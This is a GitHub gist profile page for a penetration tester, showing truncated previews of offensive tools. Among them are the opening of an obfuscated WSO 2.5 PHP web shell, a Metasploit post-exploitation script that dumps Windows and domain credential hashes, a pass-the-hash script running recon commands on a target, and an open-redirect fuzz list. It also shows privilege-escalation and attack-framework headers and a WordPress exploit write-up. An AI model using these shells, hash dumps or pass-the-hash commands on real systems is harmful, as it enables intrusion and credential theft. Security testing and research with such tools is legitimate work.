Skip to content

Instantly share code, notes, and snippets.

View 1N3's full-sized avatar

xer0dayz 1N3

3.2k followers · 37 following
View GitHub Profile
@1N3
1N3 / crt.sh
Last active February 5, 2024 15:29
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@1N3
1N3 / LinuxPrivEsc.sh
Created May 13, 2016 02:50
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
@1N3
1N3 / wso_2.5_shell.php
Last active April 24, 2023 15:13
WSO 2.5 Shell
<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;
@1N3
1N3 / Sn1per-v1.5-report
Created December 28, 2015 18:26
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://crowdshield.com
@1N3
1N3 / metasploit-post-exploitation-script-for-windows.rc
Created February 3, 2016 12:22
Metasploit Post Exploitation Script For Windows
setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
@1N3
1N3 / Sn1per v4.4 (Beta)
Created March 21, 2018 00:05
#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
#
VER="4.4"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="/usr/share/sniper/plugins"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
@1N3
1N3 / windows-post-exploitation.sh
Created February 3, 2016 12:18
A Windows post exploitation shell script
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
@1N3
1N3 / gist:de48ab54edd831cb12fb
Created July 2, 2015 09:31
Open Redirect Fuzz List
http://google.com
//google.com
\\google.com
\/google.com
\/\/google.com
/\google.com
/\/\google.com
|/google.com
/%09/google.com
/google.com
@1N3
1N3 / reverse-engineering-wordpress-0day-exploit.txt
Last active September 26, 2020 19:46
Reverse Engineering a Critical Wordpress 0day Exploit
REVERSE ENGINEERING CRITICAL WORDPRESS 0day EXPLOIT
This past weekend, I noticed an interesting alert from my mod_security logs for a request being made to my Wordpress site. Although the request was un-successful, I decided to dig deeper to understand what this was request was actually trying to do. After time, I've concluded that this is possibly a new 0day exploit attempt against Wordpress or a related Wordpress plugin (iThemes Security??). I'm still trying to uncover the exact flaw being exploited here so if anyone has any further details, feel free to contact me at 1N3@hushmail.com or twitter @CrowdShield.
ORIGINAL MOD-SECURITY REUQUEST
==> /var/log/apache2/error.log <==
[Sat Aug 15 19:00:10 2015] [error] [client 46.148.18.226] ModSecurity: Warning.
@1N3
1N3 / Enumer8-v20150705
Created July 6, 2015 00:32
Enumer8 by 1N3 v20150705
#!/bin/bash
# Enumer8 by 1N3 v20150705
# http://crowdshield.com
#
TARGET="$1"
LHOST="192.168.1.132"
LOOT_DIR="/pentest/loot"
FINDSPLOIT_DIR="/pentest/findsploit"
KEY_PATH="/pentest/linux/ssh/dsa/1024"